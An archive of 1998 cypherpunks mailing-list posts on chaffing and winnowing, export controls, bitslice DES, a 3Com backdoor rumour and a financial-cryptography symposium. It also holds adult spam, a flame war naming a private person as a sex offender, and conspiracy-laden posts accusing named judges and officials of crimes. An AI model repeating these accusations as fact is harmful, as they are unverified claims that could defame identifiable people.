our nation's continued leadership of the information industry and
the protection of personal privacy in the next century.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 12 May 1998 19:08:50 -0700 (PDT)
To: "Mordechai Ovits" <jcea@argo.es>
Subject: Re: Chaffing & winnowing without overhead
In-Reply-To: <35571323.D109A0D2@argo.es>
Message-ID: <3.0.5.32.19980512180231.008ae790@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


By the way, instead of transmitting the first bit for which
MAC(sequence,0) differs from MAC(sequence,1), as Jess suggests,
you can get the same effect by transmitting a 0 or 1 depending on
    MAC(sequence,0) < MAC(sequence,1)
(This assumes a big-endian system and unsigned comparisons;
little-endians will have to calculate it the hard way.)  
If you're willing to be wrong 1 time out of 2**33, 
you can just use the top 32 bits.

Earlier in this discussion:
>> In the Rivest's paper you transmit, indeed, all the 2^n plaintexts for a
>> n bit length };-).
>Not so. In his paper (before the package tranform stuff), he had the following expansion.
>Assuming a 32 bit serial number and a 160 bit MAC, n bits would expand to 388n.
>>To make this clearer with an example, note that the adversary 
>>will see triples of the form:
>>        (1,0,351216)
>>        (1,1,895634)
>>        (2,0,452412)
>>        (2,1,534981)

But that _does send the 2^n plaintexts, which are 0 and 1, and n=1.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Josh Schoof <josh@josh1.weboneinc.com>
Date: Tue, 12 May 1998 15:18:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199805122218.SAA26006@josh1.weboneinc.com>
MIME-Version: 1.0
Content-Type: text/plain


FROM: aj@gaymen.com
SUBJECT: Gay Site

	I just wanted to let you know that GayTV And GayMen.Com have 
	webmaster referral programs that pay you  for every person 
	that signs-up for either site.

	You can signup online and start making money now:)

	Check out our webmaster pages for all the details - you can signup 
	for both sites and make double the money.

	GayTV:      http://www.aj1.com/gaytv/webmasters
	GayMen.Com:    http://www.gaymen.com/webmasters
	
	Thanks,
	
		AJ
		GayMen.com
		aj@gaymen.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs <StanSqncrs@aol.com>
Date: Tue, 12 May 1998 15:58:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re:"... would cause us to look at this person as a threat"
Message-ID: <23d07d72.3558d3d9@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 5/12/98 4:37:47 PM Central Daylight Time,
ptrei@securitydynamics.com writes:

<< ... Considering it's content, I have no doubt that it is manufactured - it
 carefully written to offend millenialist Christians, such as the SDAs.
 I've written the page owner to see if I can find out more. ... >>

Not only that, it seems to be "spam" (the repetitive list type).  You see 2
days ago we welcomed a guest to my list (FreeGroup), and in his first batch,
guess what was there.  Another FreeGroupie had a great response to it, I
include it -
=====
... writes:

> Well howdy 'yall, i'm mighty proud to have someone to chat wdith and share
>  ideas and some news, both good and bad.
>  here's some bad news to start off the day
>  
>  RE: Janet Reno, Attorney General of these United States of America
>  
>  Subject: Janet Reno Quote
>  > Date: Wednesday, May 06, 1998 10:54
>  > 
>  > A friend sent me this...sure would like to see the interview in context,
>  > but at any rate a very scary statement.
>  > 
>  > Subject: Cults and Government? 
>  > 
>  > "Just ran across this quote from AG Janet Reno. From a person of such
>  > high power, these are scary words. --------- "
 
<snip - the "spam">

>  > "-Attorney General Janet Reno, Interview on 60 Minutes, June 26,
>  > 1994"
>  > 

Bad *NEWS*???  This purports to be an item that's nearly 4 years old.  What's
the news?  I guess the news is that we're getting this 3rd hand--at a minimum,
with no idea if it's true or not.  But hey!  This is the internet.  So, again,
I ask, *NEWS*????

Bad beginning, Sir Will.  The willingness to pass along material of dubious
authenticity is not a good sign in my book. As Mr. Natural would say, "Check
your source."  So, what *IS* your source?
=====
Thanks for your excellent research on the origins of that, Peter!

Stan,
FreeGroup - "Just Say It!"
http://members.aol.com/WhtsAMetaU/freegroup.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Rosen" <mrosen@peganet.com>
Date: Tue, 12 May 1998 17:21:50 -0700 (PDT)
To: "Mordechai Ovits" <ryan@michonline.com>
Subject: Chaffing and winnowing
Message-ID: <01bd7e04$5802a820$014ce9c7@markdsk.peganet.com>
MIME-Version: 1.0
Content-Type: text/plain


    I have just been notified that chaffing and winnowing does, indeed,
violate the export regulations. You can read them for yourself at
http://www.bxa.doc.gov/Encryption/encreg.htm, but here are a few parts


a. Designed or modified to use ``cryptography'' employing digital techniques
to ensure ``information security'';
b. Designed or modified to perform cryptanalytic functions;
c. Designed or modified to use ``cryptography'' employing analog techniques
to ensure ``information security'';
...
Note: 5A002 does not control the following:
b. Equipment containing ``fixed'' data compression or coding techniques;
...
g. Data authentication equipment that calculates a Message
Authentication Code (MAC) or similar result to ensure no alteration of
text has taken place, or to authenticate users, but does not allow for
encryption of data, text or other media other than that needed for the
authentication;

    So it seems 5A002.a  and 5A002.g cover such encryption technologies as
chaffing and winnowing. Interestingly enough, 5A002.b allows such functions
as the package transform (keyless coding), even though it uses encryption
algorithms.


- Mark Rosen
http://www.mach5.com/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Tue, 12 May 1998 13:07:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [Fwd: 3Com switches - undocumented access level.]
In-Reply-To: <Pine.BSF.3.91.980509032901.17424A-100000@mcfeely.bsfs.org>
Message-ID: <199805121909.VAA31944@linux.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain


To my knowledge (and the rather credible statements of several 3Com
representatives), there are:

No undocumented accesses to SS 1000, 1100, 3000,3300.
There is one documented access to the CB7000, but that can easily be
removed (i.e. -> login in with the magic username and change the password).
We did that at our site, as we never ever forgot a password to our
equipment (yet).

So, what's the hype, the "backdoor" is only for clueless users, not serious
companies with a security policy.
-----------------------------------------------------
Fatum favet volenti. (anon)
-----------------------------------------------------
Remo Pini                         T: +41  1 350 28 88
Pini Computer Trading             N: +41 79 216 15 51

http://www.rpini.com/             Email: rp@rpini.com
----------------------------------------------------- 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Thompson <jim@smallworks.com>
Date: Wed, 13 May 1998 00:48:08 -0700 (PDT)
To: cryptography@c2.org
Subject: [rivest@theory.lcs.mit.edu: Chaffing question]
Message-ID: <199805130747.CAA18984@hosaka.smallworks.com>
MIME-Version: 1.0
Content-Type: text/plain



With all of the discussion of C&W, and potential expansion, along with
a sideband discussion of same, I decided to ask 'the man' himself.

The '10K email file' used in the example came from the sideband discussion.

Forwarded for your edification.

 ------- Start of forwarded message -------
 Date: Tue, 12 May 1998 18:24:46 -0400
 From: Ron Rivest <rivest@theory.lcs.mit.edu>
 Subject: Chaffing question

 Suppose you can start with a 10KB email file.

 Running a package (all-or-nothing) transform on it adds only a small
 amount to the length---say 128 bits total, or less (basically the length
 of a key in your favorite algorithm).

 You can break the result into 128 one-bit blocks and one 10KB block.  MAC
 each block.

 Add 128 bits of chaff, intermingled with the first 128 blocks from above.

 The final result has 128+128+1 packets, and total length 10KB (the
 original email) + 257*64 bits (for the 257 64-bit MAC values) plus 128
 bits (the chaff bits), and assuming that the sequence numbers are
 implicit rather than explicit, you get a total of around 12.3 KB.  

	 Cheers,
	 Ron

 ------- End of forwarded message -------

-- 
Jim Thompson / Smallworks, Inc. / jim@smallworks.com  
      512 338 0619 phone / 512 338 0625 fax
Real, cheap Hardware RNG:  http://www.fringeware.com/nscd/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 12 May 1998 18:37:11 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Gary Lee Burnore is a Convicted Sex Offender in Raleigh, NC
In-Reply-To: <199805101850.LAA00114@sirius.infonex.com>
Message-ID: <199805130137.DAA03874@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


wmcclatc@primenet.com (William J. McClatchie)

> X-Comment: Aw, are you offended?  
> X-no-archive: yes  
 
> [anonymous makes illegal usage of information, as defined by the state he
> got the info from, and then whines] 

And your legal basis for calling the posting of public information from a
public website to usenet "illegal usage" is ???  Presumably if the state
had wanted to keep the info secret, they wouldn't have made it public
available.

The only whining I've seen has been by Gary Burnore who complained that the
state of North Carolina failed to keep his conviction as a sex offender a
secret, and by various DataBasix sock puppets and groupies.

Burnore did the crime, he was convicted, he registered as a sex offender
with the state of NC, the information was made publicly available by the
state, and people found out as they were intended to.  Deal with it!

Maybe you ought to learn a little about remailers before you make such
ridiculous claims, McClatchie.  If I'm the person you say "whined", then
I'm *NOT* the same person who posted the information that Gary whined
about.  Sorry to burst Gary's bubble that all posts which poor little Gary
Burnore doesn't like originate from his one mythical "Anon Asshole <tm>".
In fact, the information is just as likely to have been posted anonymously
by YOU as by me.

> >It's people like you and Gary Burnore who threaten and harass people who
> >say things you don't like that make anonymous remailers necessary.
> 
> >And it is assholes like you who ABUSE remailers that make them go away.  

Let me get this straight...  Someone threatens a remailer user with
physical violence, I comment on it, and now I'm "abusing a remailer" just
because you don't like what I have to say?  Don't you think that's for the
remailer operator to decide?  Do you operate a remailer, McClatchie?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eridani@databasix.com (Belinda)
Date: Wed, 13 May 1998 01:18:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Abusive crossposting by anonymous remailer user (Was: Gary L. Burnore blah blah blah)
In-Reply-To: <199805101850.LAA00114@sirius.infonex.com>
Message-ID: <199805130820.EAA18605@databasix.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199805130137.DAA03874@basement.replay.com>,
nobody@REPLAY.COM (Anonymous)  wrote:

[who cares what he wrote]

Where's the idiot who was ranting about kooks who crosspost threads
everywhere and called -me- a Usenet abuser?  Take a look at the
references in this one:

References: <199805101850.LAA00114@sirius.infonex.com>
<3555FA78.7795@pageplanet.com>
<199805121307.PAA21528@basement.replay.com>
<6ja344$i2h@nntp02.primenet.com>


<199805101850.LAA00114@sirius.infonex.com>
 posted to triangle.general only

<3555FA78.7795@pageplanet.com>
 posted to triangle.general only

<199805121307.PAA21528@basement.replay.com>
posted to:  alt.fan.gburnore,triangle.general,alt.vigilantes,
alt.netcom.emeritus,alt.cypherpunks,news.admin.censorship,
alt.privacy,alt.privacy.anon-server,misc.kids


And there we have it, folks.  The anonymous stalker who's spent the past
year following Gary Burnore around Usenet found a post in
triangle.general that mentioned him, added a propaganda-filled follow up
to it, and posted it to 9 newsgroups--many of whom have repeatedly
requested that this crap be kept out of said groups.

Oh and lookee what else:  it was mailed to cypherpunks@toad.com,
presumably for archival on the cypherpunks mailing list, where it will
be picked up by WWW search engines.  Since those folks don't seem to
mind having their archives used in personal grudge matches, I'll just
start cc'ing my responses there as well.  I'm sure, as champions of free
speech, they can understand the necessity of making sure both sides of
the story get equal time.

--

Belinda















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 13 May 1998 08:27:52 -0700 (PDT)
To: wire@monkey-boy.com
Subject: Hidden US government
Message-ID: <3559B706.F@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Guys

There is a segment in the US government who do whatever they want.

Like stinging Iran.

The segment thinks that they are unaccountable.

We want to change this.

And get our money too!


Wednesday 5/13/98 7:40 AM

Lawyers and netizens

Morales and my last Friday filing seen at
http://www.jya.com/whp050898.htm

is causing comments at http://www.jya.com/mf050998.htm and elsewhere.

One of my neighbors, Bill Moe, is a retired AF officer and now an APD
cop.

Moe commented that no lawyer would ever write a document like the one
we FILED.

Morales is ready to go to the Supreme Court on this case for the reasons
of
Campos dismissing DIR NSA Minihan.

Morales feels that this decision make no one in a federal agency
accountable..

We will also probably have to appeal the dismissal of Morales too.  Bad
precedent.

Now that we have copies of the docket sheets seen at
http://www.jya.com/whp-10usca.htm
we must study them.

We will do this at noon today.

Then we will begin the process of filing criminal complaint affidavits
on Tenth
circuit judges and judge Joseph Weis, of the Third circuit.

Dolores K. Sloviter
Chief Judge, Third Circuit
18614 U.S. Courthouse 
Philadelphia, PA 19106
215-597-1588

also EARNED a criminal complaint affidavit along with clerks Bradford
Baldus
and Toby Slawsky.

Slawsky earned another for sending US Marshals Lester and Lopez to
investigate me,
with no letter of authorization, for "inappropriate communications."

The matter of Campos' in camera ex parte meeting with NSA is also
causing CONCERN.
http://www.jya.com/whp043098.htm

NM judge John Conway had an ex parte in camera meeting with Sandia/NSA
high tech 
terrorist James Gosler in 1992 in my ADEA lawsuit.

Conway then sealed all of my lawsuit court records and halted discovery.

Then there was the matter in both my and Morales lawsuits of  material
showing up in the
final district decisions which was not in pleadings.

A district federal court spy gave us information that Sandia wrote the
decision for, in 
Morales case, judge Galvan and my case, John Conway.

These actions by judges and court clerks largely prompted Morales and my
genocide 
and crypto incompetence lawsuit.

We know that the federal courts and the legal system are LARGELY
controlled by the 
US federal government.

This is becoming more obvious to all by those who read
http://www.jya.com/whp043098.htm.

The US Hidden government is in reality a fascist government.

  FASCISM -   a political and economic movement, strongly nationalistic,
magnifying the rights
  of the state as opposed to those of the individual, in which industry,
though  remaining largely 
  under private ownership, and all administrative political units,  are
controlled by a strong central   government.

Since Morales and I have both lost money as a result of actions of a
fascist government, we struck at the heart of the US Hidden government
[aka The Great Satan] with our genocide and crypto incompetence lawsuit.

Representative Cynthia McKinney [CYMCK@mail.house.gov ] and Senator
Grassley [chuck_grassley@grassley.senate.gov] are in possession of the
Swiss Radio International audio tape telling the saga of Hans Buehler's
arrest in Teheran in 1992 for espionage.

Hopefully those who are concerned can share their concerns about
possible consequences of NOT releasing our requested documents on
Internet.  And, too, encourage settlement of this NSA-caused American
tragedy. http://caq.com/cryptogate 
http://www.aci.net/kalliste/speccoll.htm

Morales and I continue to feel that we should settled this unfortunate
matter before it gets WORSE.

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Zander <gibreel@pobox.com>
Date: Wed, 13 May 1998 09:43:42 -0700 (PDT)
To: "Mark Rosen" <mrosen@peganet.com>
Subject: Re: Chaffing and winnowing
In-Reply-To: <01bd7e04$5802a820$014ce9c7@markdsk.peganet.com>
Message-ID: <874syut9ld.fsf@wsuse5.mckesson.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Mark" == Mark Rosen <mrosen@peganet.com> writes:
    Mark> Note: 5A002 does not control the following: b. Equipment
    Mark> containing ``fixed'' data compression or coding techniques;
    Mark> ...  g. Data authentication equipment that calculates a
    Mark> Message Authentication Code (MAC) or similar result to
    Mark> ensure no alteration of text has taken place, or to
    Mark> authenticate users, but does not allow for encryption of
    Mark> data, text or other media other than that needed for the
    Mark> authentication;

But wasn't that the gist of Rivest's paper: he's not encrypting the
message, he's just obscuring it really, really well.

All this needs someone with the cash & the time to push it to court...

-- 
Stephen
---
all coders are created equal; that they are endowed with certain
unalienable rights, of these are beer, net connectivity, and the
pursuit of bugfixes...  - Gregory R Block




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mkwan@preston.net (Matthew Kwan)
Date: Tue, 12 May 1998 16:42:35 -0700 (PDT)
To: rcv@dopey.verser.frii.com
Subject: Bitslice DES S-boxes
Message-ID: <199805122341.JAA18008@preston-gw.preston.net>
MIME-Version: 1.0
Content-Type: text/plain


After 6 weeks of number crunching, I've finally produced a new set of
bitslice DES S-boxes using non-standard logic gates.

Numbers are as follows -

	S1  S2  S3  S4  S5  S6  S7  S8   Avg
	56  50  53  39  56  53  51  50   51

Details at http://www.cs.mu.oz.au/~mkwan/bitslice

There won't be any more improvements in the foreseeable future, since
I've run out of ideas.

Feel free to use this code in the RSA DES II challenge, but remember to
give credit where it's due.


mkwan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@mentat.com (Jim Gillogly)
Date: Wed, 13 May 1998 11:18:31 -0700 (PDT)
To: whitelaw@ndirect.co.uk
Subject: Re: Encryption trends and legal issues
Message-ID: <9805131814.AA00340@mentat.com>
MIME-Version: 1.0
Content-Type: text/plain


Gavin skribis:
> I am looking for information on the legal and export issues on
> encryption around the world and the current use of different encryption
> algorithms today.

For legal/export issues:
http://cwis.kub.nl/~frw/people/koops/lawsurvy.htm

He keeps it up-to-date, and it covers the world.  For current use of
different encryption algorithms, I think TIS has a continuing project
monitoring availability of packages worldwide using different systems.

	Jim Gillogly




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vpuser@u041.oh.vp.com (ADMIN-Standard VP login)
Date: Wed, 13 May 1998 09:23:37 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Question reports on Y2K report
Message-ID: <m0yZeJN-0002MvC@u041.oh.vp.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

Has anyone read "The McAlvany Intelligence Advisor" of Febuary 1998?

Title:
The millenium Bug: Global cyber-meltdown in the year 2000 PART 1

Mr McAlvany has a very domesday perspective.  Does his report have
alot of Truth or alot of Hype?

Please don't flame me to hard for my ignorance,  I'm just attempting
to seperate the CHAF from the WHEAT.

Thank you for any guidance
Brian

-- 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 13 May 1998 12:54:02 -0700 (PDT)
To: wmadsen@explorer.csc.com
Subject: Pottery, Stalingrad , Fascists, Sandinistas, and settlement, of course
Message-ID: <3559F93A.1828@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Wednesday 5/13/98 1:17 PM

John Young
J Orlin Grabbe

Tuesday evening Patty and I journeyed to Placitas, NM.

Patty was going to have some kindergarten student pottery
projects kiln fired.

Karl and Mary Hofmann are fine artists.  Pottery.

Both are graduate school graduates in fine arts.

Karl is German-born.

Karl told me his brother helped build the Russian pipeline system.
And it isn't buried deep enough.

Karl told me his brother was captured at Stalingrad.

I think that I read that only about 10% who were captured at Stalingrad
lived to return. http://www.semionoff.com/cellular/hacking/phreaking/

Patty and I bought you both identical gifts from Hofmann's.

I am on the way to mail them.

Thank you both for so much for what you both have done.  Visibility.

http://jya.com/whpfiles.htm
http://www.aci.net/kalliste/

The Hidden US Government was trying to bury us in their invisible grave
yard.

But NOW the WORLD is on to the composition of the US Hidden Government.

  FASCISM -   a political and economic movement, strongly nationalistic,
magnifying the rights
  of the state as opposed to those of the individual, in which industry,
though  remaining largely 
  under private ownership, and all administrative political units,  are
controlled by a strong central   government.

Especially, after all of this, aggrieved Shiite Muslims. 
http://www.wpiran.org/

And now, perhaps, even Sandinistas too.

Carlos brought Swiss Radio International audio tape to Nicaragua this
spring from Moscow ... Idaho,
that is.  http://caq.com/cryptogate

Let's all hope for prompt PEACEFUL settlement of this HORRIBLE chapter
in US history.

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 13 May 1998 11:00:00 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Philodox Symposium: Digital Bearer Transaction Settlement
Message-ID: <v04003a22b17f8e3a802c@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


X-Sender: rah@pop.sneaker.net
Mime-Version: 1.0
Date: Wed, 13 May 1998 12:54:33 -0400
To: Digital Bearer Settlement List <dbs@philodox.com>
From: Robert Hettinga <rah@shipwright.com>
Subject: Philodox Symposium: Digital Bearer Transaction Settlement
Sender: <dbs@philodox.com>
Precedence: Bulk
List-Subscribe: <mailto:requests@philodox.com?subject=subscribe%20dbs>
X-Web-Archive: http://www.philodox.com/dbs-archive/


-----BEGIN PGP SIGNED MESSAGE-----

Announcement Date: May 13, 1998


The Philodox Symposium on Digital Bearer Transaction Settlement
The Downtown Harvard Club
Boston, Massachusetts
July 23-24, 1998

Philodox Financial Technology Evangelism, of Boston, Massachusetts, in
association with the Digital Commerce Society of Boston, announces the
first in a series of symposia, conferences and workshops on the subject of
digital bearer transaction settlement.

The first of these gatherings, a symposium examining the technology,
economics, markets and law of digital bearer settlement, will be held at
the Harvard Club of Boston, Thursday and Friday, July 23 and 24, 1998.


What is Digital Bearer Settlement?

A digital bearer transaction is one where a cryptographically secure
value-object, issued and underwritten by a third party, is exchanged
between the two parties in a trade, typically over a public internetwork.
The object, when passed in trade for something else of value, executes,
clears, and settles the transaction instantaneously, securely, and,
usually, anonymously. And, at considerable savings in transaction cost
compared to "book-entry" transactions, such as credit and debit cards,
checks, and modern securities clearing methods.

It is estimated that $100 billion in transactions are being executed on the
internet annually.  40% of all retail stock trades are now executed from
the net, for instance. If it's possible to properly call a credit card
transaction transmitted under Secure Socket Layer to be settled and cleared
on the net itself, then an estimated maximum of $10 billion of those
transactions, 10%, are actually cleared and settled on the net, with
marginal market share to other transaction protocols. By comparison, $3
trillion in foreign exchange transactions are executed, cleared and settled
every day, using standard book-entry processes.

There are electronic check and debit protocols in experimental development,
but, as transaction settlement time tends towards the instantaneous, the
more cost, security, and non-repudiation advantages there are for digital
bearer settlement.

It is not unreasonable to see how transaction costs can be reduced
enormously by digital bearer settlement, possibly by several orders of
magnitude over any analogous book-entry method. It is completely
conceivable that digital bearer transactions, of all kinds and sizes, from
macrobonds to micropayments, will be executed, cleared, and settled on
ubiquitous global internetworks, and will become the dominant transaction
mechanism over time on those networks, and, by extension, in the global
economy in general.

It may happen sooner than we can imagine. Electronic book-entry settlement
itself is only 40 years old at best, and internet financial cryptography
and digital bearer settlement are much more a phenomenon of collapsing
microprocessor prices than electronic book-entry settlement ever was.


The Philodox Digital Bearer Transaction Settlement Events

Towards that end, Philodox has taken it upon itself to focus the attention
of the information technology, financial and legal communities onto the
technology of digital bearer settlement though the following series of
events. First, this initial Symposium of professionals interested in
digital bearer settlement, to be held in Boston. Then, contingent on
interest, a peer-reviewed Financial Research Conference to be held
during the winter of 1998-99 in Manhattan or Washington, followed by a
small Developer's Conference in the spring of 1999, held in more casual
surroundings, and, finally, a teaching Workshop for Financial Professionals
held in the summer of 1999 at a resort location, probably Bretton Woods, New
Hampshire. It is hoped by Philodox that some, or perhaps, all, of these
events will be recurring ones, and of course, that they will increase in
attendance over time.


The Symposium

Each section of the Symposium agenda will consist of a short presentation
on the topic by the most expert symposium participant on the subject
present, followed by discussions led by a moderator. While it is not
expected that everyone will even be conversant on each topic, it is
expected that participants will bring their own particular expertise to
bear on specific elements of the symposium program, and, of course, not
everyone will have to present something.

We have a lot to teach each other, but, fortunately, most of the people who
are interested enough in this topic to come to this first symposium will
know more than enough to have at least some opinions on the topics under
discussion, and will certainly want to share those opinions with everyone
else.  Finally, there are lots of differing opinions this subject, so
expect some animated discussion.

Because of the expected demand and the size of the Harvard Club space we're
using, participation in the symposium will be limited, and advance
registration will be required. See below for details.


The Symposium Agenda

Agenda

The Philodox Symposium on Digital Bearer Transaction Settlement
The Downtown Harvard Club of Boston
July 23-24, 1998


Thursday, July 23, 1998
(Club Dress Code: jacket and tie, no jeans or sneakers)

0730-0830:  Check-in, Breakfast

0830-0845:  Welcome

0845-1015:  History of Bearer Transaction Settlement

            How old is bearer settlement?
            Why should we think about physical bearer settlement?
            What were the market models for underwriting digital bearer
             instruments?
            What sanctions prevented non-repudiation?
            What happened to physical bearer settlement?
            What is digital bearer settlement?
            How was it invented?
            What is the status of digital bearer settlement now?

1015-1030:  Break

1030-1200:  Digital Bearer Settlement Technology Survey and Forecasts

            What are the different digital bearer settlement protocols?
            How do they work?
            Which ones are on the market today?
            What are some of the technical limits of these protocols?
            Can they be overcome and do they need to be?
            What kinds of technology is in the labs?

1200-1300:  Lunch

1300-1500:  Bearer Settlement Legal/Regulatory Survey and Forecasts

            How did we get transaction regulation in the first place?
            What are the legal restrictions on bearer transactions
             in general?
            What are the laws on strong cryptography?
            How do the above laws and regulations effect the prospects
             for digital bearer settlement?
            What effect will cash-settled, and possibly anonymous,
             digital auction markets have on intellectual property rights?

1500-1515:  Break

1515-1715:  Possible Legal/Regulatory Solutions

            What can be done about bearer settlement law and regulation?
            Are there ways that internet digital bearer settlement can
             coexist with book-entry settlement laws?
            Will the potential cost savings overcome the need to regulate?
            What about intellectual property laws?
            Should there be a legislative/regulatory strategy?
            If so, what would it look like?

1730-1930:  Reception, Cocktails and Hors d'Oeurves


Friday, July 23, 1998
(Dress Code: "business casual", no jeans or sneakers)

0800-0830:  Breakfast

0830-0845:  Announcements

0845-1015:  Internet Transaction Settlement Economic/Financial Survey
             and Forecasts

            What is the annual dollar volume of all transactions worldwide?
            How are they broken up by payment mechanism?
            What is the actual and forecasted dollar volume of internet
             transaction execution?
            How will those transactions clear and settle?
            What are the current clearing and settlement costs?
            What are the expected costs of internet digital bearer
             settlement?
            What is the micro- and macroeconomic impact of a digital bearer
             settled economy?

1015-1030:  Break

1030-1200:  Capital Market Applications for Digital Bearer Settlement

            What kinds of securities can you create digital bearer
             instruments for?
            How do they work?
            How do you vote stock, collect dividends, etc.?
            Can you really do limited liability in software, without law?
            What size transactions can be cleared and settled like this?
            How much transaction volume can a digital bearer market handle?

1200-1300:  Lunch

1300-1430:  Other Market Applications for Digital Bearer Settlement

            Just how ubiquitous can the internet be?
            Can you create cash settled pay-per-use utilities? Even roads?
            Digital bearer gambling tokens? "Digital Collectibles"??
            Lions, and tigers, and bears: "Perfect kidnappings",
             "crypto-anarchy", auction markets for force, geodesic warfare,
             the end of civilization as we know it, and other monsters
             under the bed.

1430-1445:  Break

1445-1630:  New Product/Market Ideas for Digital Bearer Settlement

            Who are the entrepreneurs?
            What else can we do with digital bearer instruments?
            When is the transition to digital bearer settlement
             going to happen?
            Where's the most bang for the buck, right now?
            How are we going to make money on this?

1630-1645:  Closing


Symposium Cost and Registration

The cost for the Philodox Symposium on Digital Bearer Transaction
Settlement is $447, payable by company check or personal money order to
"Philodox", and sent to Robert Hettinga, Philodox Financial Technology
Evangelism, 44 Farquhar Street, Boston, MA, 02131, USA. Massachusetts
residents should add 6% sales tax. Please contact Robert Hettinga
<mailto:rah@philodox.com>, or <mailto:rah@shipwright.com> for wire
instructions if it is necessary to make your payment by bank wire.

Include the participant(s) name, shirt size, email address, and company
affliation, if applicable, with your check or money order. Confirmation of
your check and your Symposium seat will be sent by email. If you pay by
wire, please notify Mr. Hettinga by email that you intend to do so, and
include in your email the other requested information.

In order to organize the Symposium properly, payment must be received by
Philodox no later than noon, Thursday, July 9th, 1998. Again, attendance to
the Symposium is limited, so please register as soon as possible to assure
your seat.

The Symposium fee goes towards conference room rental, breakfasts,
lunches, a cocktail reception on Thursday night, snacks, audio-visual
rental, internet access on-site, various mementoes of the occasion, and, of
course, Philodox's event management fee.


Scholarships

A small number of scholarship fee-waivers will be available, contingent
upon direct sponsorship and the size of the Symposium, to be selected by
Philodox and based upon the applicant's financial need and ability to
contribute to the symposium. Please contact Robert Hettinga, <mailto:
rah@philodox.com>, or <mailto: rah@shipwright.com>, if you want to request
a fee-waiver.


Sponsorship

In addition to direct event and website sponsorship opportunities,
including the possiblity of exhibition space, there are several in-kind
sponsorship opportunites available, particularly in the areas of
audio-video services and internet services, including internet access,
web-casting and web-page development. Please contact Robert Hettinga,
<mailto: rah@philodox.com>, or <mailto: rah@shipwright.com>, if you're
interested in in-kind or direct sponsorship of the Symposium.


The Digital Bearer Settlement Email List: dbs@philodox.com

As part of Philodox's ongoing support of the technology of digital bearer
settlement, an email list has been established to discuss the technology
and it's ramifications in an unmoderated, informal setting. Please see
<http://www.philodox.com/> to see the archives of the Digital Bearer
Settlement discussion list, and its subscription information.  If there is
enough demand, an additional announcement list for the Symposium itself
will be created, but it is hoped that the Symposium's participants will use
dbs@philodox.com as a "watering hole" for their discussions.


Who is Philodox?

Philodox is a new financial technology evangelism company founded by Robert
Hettinga, founder of the Digital Commerce Society of Boston, and founding
moderator and editor of several internet discussion lists and newsletters
on digital commerce and financial cryptography. Mr Hettinga is also the
founder of both the International Conference on Financial Cryptography, and
the International Financial Cryptography Association.

For more information on Philodox, please see <http://www.philodox.com>. For
more information on Robert Hettinga, please see <http://www.shipwright.com>.
For more information on the Digital Commerce Society see <mailto:
majordomo@ai.mit.edu?body=info%20dcsb>. For more information on the
International Conference on Financial Cryptography, see
<http://www.fc98.ai/>.


See You in Boston!

Cordially,
Robert Hettinga

Founder,
Philodox Financial Technology Evangelism
Boston, Massachusetts


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNVnPvMUCGwxmWcHhAQGEDwf6AzFX53KDFRwNieTsU7M19nLf7F88BNWM
bu+ii9aJsrAFlvkllyFuruVMjEWiYpNTfj5xPEJaaIxeHFRR6vNJet7XekAMjg1O
ZeYzs86I9DovtSIpSuSt3uHcPuwPgE9ZvO0parHwUl64uZ1cTldExYPCaquqU1K0
YzOVI+01MNKs/T5Zo68nRhkm1DfzYCE3DjKs4YA2mgA8nmgpqjhbnncOYATgv3Up
H+RRLLVSHD3nKh2RdK49RtGpRg6YvDRI3FP0vPaPTAMNy6A0KREhcnixZp8CZhBC
X510YO4ctlUkcS6esfSL9NyDZNlvLPZ4DdFveFgCurqvrUF5dyHMvQ==
=6min
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
